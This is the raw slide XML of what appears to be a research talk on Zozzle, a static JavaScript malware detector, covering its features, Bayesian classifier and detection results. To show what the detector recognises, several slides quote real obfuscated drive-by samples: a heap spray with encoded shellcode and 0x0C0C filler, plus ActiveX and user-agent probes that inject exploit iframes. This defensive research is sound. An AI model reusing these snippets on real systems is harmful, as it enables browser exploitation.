            <a:off x="5975445" y="6169609"/>
            <a:ext cx="1524000" cy="365074"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -104548"/>
              <a:gd name="adj2" fmla="val -1684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loop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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:memory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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8" grpId="0" animBg="1"/>
      <p:bldP spid="29" grpId="0" animBg="1"/>
      <p:bldP spid="56" grpId="0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Blacklisting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malware in Search Results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56032" y="2255320"/>
            <a:ext cx="3096768" cy="4221680"/>
            <a:chOff x="6302085" y="956449"/>
            <a:chExt cx="2713038" cy="2842010"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Picture 12" descr="http://www.applewooddata.co.uk/Images/Server%20Farm%20front%20Veiw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46"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6302085" y="956449"/>
              <a:ext cx="2096428" cy="2096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http://userlogos.org/files/logos/Rog/bing.com_0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3872" y="2461350"/>
              <a:ext cx="2111251" cy="1337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52" name="Picture 1" descr="image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"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="2033016"/>
            <a:ext cx="8172976" cy="4075176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29200" y="2667000"/>
            <a:ext cx="3962400" cy="1752600"/>
            <a:chOff x="990601" y="3429000"/>
            <a:chExt cx="3962400" cy="1752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Rectangular Callout 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="990601" y="3429000"/>
              <a:ext cx="3962400" cy="1752600"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -69140"/>
                <a:gd name="adj2" fmla="val 4065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76" y="3543300"/>
              <a:ext cx="3676650" cy="152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57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Naïve Bayes </a:t>
            </a:r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733CA-B356-49D5-A97B-A5F72900BA3A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>20</a:t>
            </a:fld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4728273" y="2131905"/>
            <a:ext cx="3876675" cy="3313671"/>
            <a:chOff x="5067300" y="2629929"/>
            <a:chExt cx="3876675" cy="3313671"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="Oval 62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6058801" y="3857625"/>
              <a:ext cx="550648" cy="5506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144526" y="3921001"/>
              <a:ext cx="342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*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5067300" y="2629929"/>
              <a:ext cx="1181100" cy="11038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5067557" y="3048451"/>
              <a:ext cx="1076969" cy="8001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5067557" y="3413525"/>
              <a:ext cx="991244" cy="5198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5067557" y="3733800"/>
              <a:ext cx="939371" cy="2972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5067557" y="4132949"/>
              <a:ext cx="93937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5067557" y="4242967"/>
              <a:ext cx="939371" cy="2628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5067557" y="4326176"/>
              <a:ext cx="991244" cy="5506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5067557" y="4425458"/>
              <a:ext cx="1076969" cy="8395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5067557" y="4483683"/>
              <a:ext cx="1180843" cy="10789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067557" y="4533900"/>
              <a:ext cx="1266568" cy="1409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6656928" y="4132949"/>
              <a:ext cx="4528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115175" y="3882444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P(malicious)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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359921"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="990600" y="1788160"/>
          <a:ext cx="3525538" cy="4079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45186"/>
                <a:gridCol w="13803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P(malicious)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string:0c0c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function:shellcode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loop:memory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Function:ActiveX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try:activex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if:msie</a:t>
                      </a:r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 7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function:Array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function:unescape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urier New" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>loop:+=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ourier New" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>loop:nop</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200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6" name="Rectangular Callout 95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6317901" y="1540202"/>
            <a:ext cx="968578" cy="1143638"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -64937"/>
              <a:gd name="adj2" fmla="val 105542"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2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pt-BR" sz="400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(""+O(2369522)+O(1949494)+O(2288625)+O(648464)+O(2304124)+O(2080995)+O(2020710)+O(2164958)+O(2168902)+O(1986377)+O(2227903)+O(2005851)+O(2021303)+O(646435)+O(1228455)+O(644519)+O(2346826)+O(2207788)+O(2023127)+O(2306806)+O(1983560)+O(1949296)+O(2245968)+O(2028685)+O(809214)+O(680960)+O(747602)+O(2346412)+O(1060647)+O(1045327)+O(1381007)+O(1329180)+O(745897)+O(2341404)+O(1109791)+O(1064283)+O(1128719)+O(1321055)+O(748985)+...);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="400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8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ke-msn-manu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ke-msn-aut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5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 of Zozzle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20995269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07867188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298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191000" y="2209800"/>
            <a:ext cx="4572000" cy="40687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Evaluated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Zozzle on millions of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>samples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Have been running it for several months on the web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1,000s malicious sites daily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41987658"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="381000" y="16764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286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Features &amp; Throughput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8" y="2133600"/>
            <a:ext cx="8598222" cy="327659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03" y="1371600"/>
            <a:ext cx="6557597" cy="5089479"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642582" y="5562600"/>
            <a:ext cx="8229600" cy="70088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1 MB of JavaScript code a second</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1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2942169" y="1313688"/>
            <a:ext cx="4343400" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -49745"/>
              <a:gd name="adj2" fmla="val 8116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Sweet spot: around 300 features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889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False Positives &amp; False Negatives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52516" y="1600200"/>
            <a:ext cx="5909182" cy="990600"/>
            <a:chOff x="1652516" y="2286000"/>
            <a:chExt cx="5909182" cy="990600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rounded Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1652516" y="2286000"/>
              <a:ext cx="2690884" cy="990600"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="0070C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Set of 10,000 samples</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2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99304" y="2550467"/>
              <a:ext cx="2462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0 false positives</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="24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34618" y="1524000"/>
            <a:ext cx="5909182" cy="990600"/>
            <a:chOff x="1652516" y="2286000"/>
            <a:chExt cx="5909182" cy="990600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rounded Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1652516" y="2286000"/>
              <a:ext cx="2690884" cy="990600"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="0070C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Set of 1.2M samples</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="28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99304" y="2550467"/>
              <a:ext cx="2462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4 false positives</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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297635"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="762000" y="3886200"/>
          <a:ext cx="3886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43983"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5099304" y="3886200"/>
          <a:ext cx="381609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ular Callout 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="2819400"/>
            <a:ext cx="3810000" cy="2209800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 48361"/>
              <a:gd name="adj2" fmla="val 8429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Finds more malware than any other detector we know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778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7" grpId="0">
        <p:bldAsOne/>
      </p:bldGraphic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5800" y="1801201"/>
            <a:ext cx="7772400" cy="45233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tIns="182880" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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navigator.userAgent.toLowerCase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().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indexOf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x6D"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"\x73\x69\x65"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"\x20\x36"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)&gt;0)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=x6.htm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navigator.userAgent.toLowerCase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().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indexOf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x6D"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"\x73"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"\x69"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"\x65"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"\x20"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"\x37"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)&gt;0)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=x7.htm&gt;&lt;/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try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a;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ActiveXObject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"Sh"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"ockw"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"av"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"e"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Fl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+[…]);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catch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{ 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finally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(a!=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"[object Error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]"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400" i="1" dirty="0" err="1" smtClean="0"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=svfl9.htm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try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c;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f=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new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ActiveXObject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"O"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"\x57\x43"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"\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x31\x30\x2E\x53"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+[…]);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catch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{ }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finally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(c!=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"[object Error]"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 { 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aacc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"&lt;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14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=of.htm&gt;&lt;/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iframe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&gt;"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i="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>setTimeout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aacc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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)"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, 3500);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 } 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5194494" y="3970401"/>
            <a:ext cx="3467974" cy="1200150"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 2286"/>
              <a:gd name="adj2" fmla="val -12562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"\x6D"+"\x73"+"\x69"+"\x65"+"\x20"+"\x37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</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE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"msie 7"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-152400" y="2667000"/>
            <a:ext cx="5029200" cy="1200150"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 24236"/>
              <a:gd name="adj2" fmla="val 19239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"O"+"\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x57\x43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"+"\x31\x30\x2E\x53"+"pr"+"ea"+"ds"+"he"+"et"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"OWC10.Spreadsheet"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Zozzle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990600" y="914400"/>
            <a:ext cx="3691128" cy="1200150"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 87601"/>
              <a:gd name="adj2" fmla="val 5155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"\x6D"+"\x73\x69\x65"+"\x20\x36</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE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"msie 6"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873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Next: Rozzle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72954" y="1801201"/>
            <a:ext cx="8185246" cy="5056799"/>
            <a:chOff x="272954" y="1801201"/>
            <a:chExt cx="8185246" cy="5056799"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="TextBox 20"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="685800" y="1801201"/>
              <a:ext cx="7772400" cy="4523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tIns="182880" rtlCol="0" anchor="t" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/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(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navigator.userAgent.toLowerCase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().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indexOf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(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		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x6D"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"\x73\x69\x65"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"\x20\x36"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)&gt;0)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i="1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=x6.htm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&gt;");</a:t>
              </a:r>
            </a:p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(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navigator.userAgent.toLowerCase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().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indexOf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(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	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		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x6D"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"\x73"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"\x69"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"\x65"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"\x20"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"\x37"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)&gt;0)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i="1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=x7.htm&gt;&lt;/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&gt;");</a:t>
              </a:r>
            </a:p>
            <a:p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try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b="1" dirty="0" err="1" smtClean="0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a;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aa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=new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ActiveXObject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"Sh"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"ockw"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"av"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"e"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</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1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Fl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+[…]);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catch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a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{ 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finally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b="1" dirty="0" smtClean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(a!=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"[object Error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]"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)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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" i="1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=svfl9.htm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&gt;");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}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try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c;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var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f=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new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ActiveXObject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"O"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"\x57\x43"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+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"\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" smtClean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x31\x30\x2E\x53"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+[…]);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catch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{ }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finally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{</a:t>
              </a:r>
            </a:p>
            <a:p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b="1" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>if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(c!=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0070C0"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"[object Error]"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 { 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aacc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= "&lt;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src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=of.htm&gt;&lt;/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iframe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&gt;";</a:t>
              </a:r>
            </a:p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    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" i="1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setTimeout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("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document.write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(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aacc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)", 3500);</a:t>
              </a:r>
            </a:p>
            <a:p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} } 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5" name="Picture 2" descr="http://www.theplaceforitall.com/portablefirefox/images/firefox-logo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28" b="22000"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="272954" y="5372100"/>
              <a:ext cx="1632045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-57150"/>
            <a:ext cx="3343275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47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Zozzle: Detection on a Web Scale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975166"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1203960" y="1469136"/>
          <a:ext cx="6781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1295400" y="5715000"/>
            <a:ext cx="6629400" cy="8382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Thousands of malware sites daily</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3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-19050"/>
            <a:ext cx="334327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69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2.97872E-6 L -0.27743 2.97872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3 -3.9408E-6 L -0.27743 -3.9408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4" grpId="0">
        <p:bldAsOne/>
      </p:bldGraphic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Drive-by Malware Detection Landscape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4191000"/>
            <a:ext cx="830580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572000" y="1524000"/>
            <a:ext cx="0" cy="45720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78952" y="3429000"/>
            <a:ext cx="1549848" cy="1499175"/>
            <a:chOff x="838200" y="2895600"/>
            <a:chExt cx="1549848" cy="1499175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2895600"/>
              <a:ext cx="1549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>
                      <a:lumMod val="65000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>runtime</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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8200" y="3810000"/>
              <a:ext cx="10955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>
                      <a:lumMod val="65000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>static</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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336138" y="1263092"/>
            <a:ext cx="17508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</a:rPr>
              <a:t>online</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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(browser-based)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031" y="1263092"/>
            <a:ext cx="191180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o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ffline</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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  (honey-monkey)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26321" y="2207947"/>
            <a:ext cx="2148345" cy="1462217"/>
            <a:chOff x="6805615" y="2588062"/>
            <a:chExt cx="2148345" cy="1462217"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Oval 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7655176" y="2588062"/>
              <a:ext cx="449225" cy="44922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68238" y="3198167"/>
              <a:ext cx="10231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Nozzle</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2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05615" y="3680947"/>
              <a:ext cx="2148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[Usenix Security ’09]</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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6320" y="4114800"/>
            <a:ext cx="2148345" cy="1462217"/>
            <a:chOff x="6805616" y="2588062"/>
            <a:chExt cx="2148345" cy="1462217"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Oval 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7655176" y="2588062"/>
              <a:ext cx="449225" cy="4492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97444" y="3198167"/>
              <a:ext cx="964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Z</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>ozzle</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="24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05616" y="3680947"/>
              <a:ext cx="2148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[Usenix Security ’11]</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rounded Rectangular Callout 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4777882" y="2395827"/>
            <a:ext cx="3235116" cy="1306113"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -125200"/>
              <a:gd name="adj2" fmla="val -479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Instrumented browser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Looks for heap sprays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Moderately high overhead</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rounded Rectangular Callout 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4762500" y="4343400"/>
            <a:ext cx="3235116" cy="1306113"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -125155"/>
              <a:gd name="adj2" fmla="val -4525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Mostly static detection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Low overhead, high reach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i="1" dirty="0" smtClean="0"/>
              <a:t>Can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> be deployed in browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rounded Rectangular Callout 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5651851" y="1249641"/>
            <a:ext cx="3235116" cy="1306113"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -13783"/>
              <a:gd name="adj2" fmla="val 16164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Detection more immediate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 gap between what client and server can see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789695" y="2080974"/>
            <a:ext cx="7564609" cy="4015026"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150"/>
          <a:effectLst>
            <a:outerShdw blurRad="101600" dist="127000" dir="246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Goal of Zozzle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low-overhead</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>low false positive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>mostly static detector</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>suitable for in-browser deployment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0988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0629E-6 L 0.53125 2.0629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7" grpId="0" animBg="1"/>
      <p:bldP spid="28" grpId="0" animBg="1"/>
      <p:bldP spid="3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to Recognize JavaScript Malware?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4102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Look at representative malware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commonalities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Encode them as features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2" descr="http://www.joblo.com/movie-posters/images/full/2002-signs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33" y="1524000"/>
            <a:ext cx="3063267" cy="452596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MuqEZYdx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> = "%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
              <a:t>u56e8%u0000%u5300%u5655%u8b57%u246c%u8b18%u3c45%u548b%u7805%uea01…“ ;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/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avIztsbF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> = "%u0C0C%u0C0C";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TzsygYnD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> = "%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA";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eSSOLKOd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>unescape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>MuqEZYdx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>);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pbIkPrKa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> = new Array();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wSqaQK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> = 1000;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xASdnqwj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> = 0x100000;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xAFKNqwO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> = 2;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oQkmsLLP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> = 0x01020;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EibcUrHC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>xASdnqwj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> - (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>eSSOLKOd.length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>xAFKNqwO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>oQkmsLLP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>);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cTAfWBbz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>unescape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>avIztsbF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>);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oKqMlPqL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> = 0xC0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>while (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>cTAfWBbz.length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>EibcUrHC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>xAFKNqwO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>cTAfWBbz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> += </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>cTAfWBbz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>}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GBVpRAcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>cTAfWBbz.substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>(0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>EibcUrHC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>xAFKNqwO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>delete </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>cTAfWBbz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>for (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>JyxIaABZ</a:t>
